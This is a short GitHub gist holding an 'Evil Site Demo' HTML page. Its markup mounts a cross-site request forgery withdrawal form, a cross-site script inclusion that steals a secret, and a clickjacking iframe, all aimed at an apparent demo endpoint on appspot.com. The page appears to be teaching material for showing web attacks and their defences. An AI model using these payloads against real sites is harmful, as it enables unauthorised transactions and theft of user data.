Skip to content

Instantly share code, notes, and snippets.

@lweichselbaum
Last active June 14, 2023 09:36
Show Gist options
  • Save lweichselbaum/79b7b89dcd580f80e13b13f104e14cc1 to your computer and use it in GitHub Desktop.
Save lweichselbaum/79b7b89dcd580f80e13b13f104e14cc1 to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<head>
<title>Evil Site</title>
</head>
<body bgcolor="red">
<h2>Evil Site Demo</h2>
<!-- deduct via XSRF -->
<form action="https://secmetadata.appspot.com/api/csrf?amount=10&action=withdraw" method="POST"><input type="submit"/></form>
<!-- Steal secret via XSS -->
<script src="https://secmetadata.appspot.com/api/xssi"> </script>
<!-- Clickjacking -->
<iframe src="https://secmetadata.appspot.com/api/frame">
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment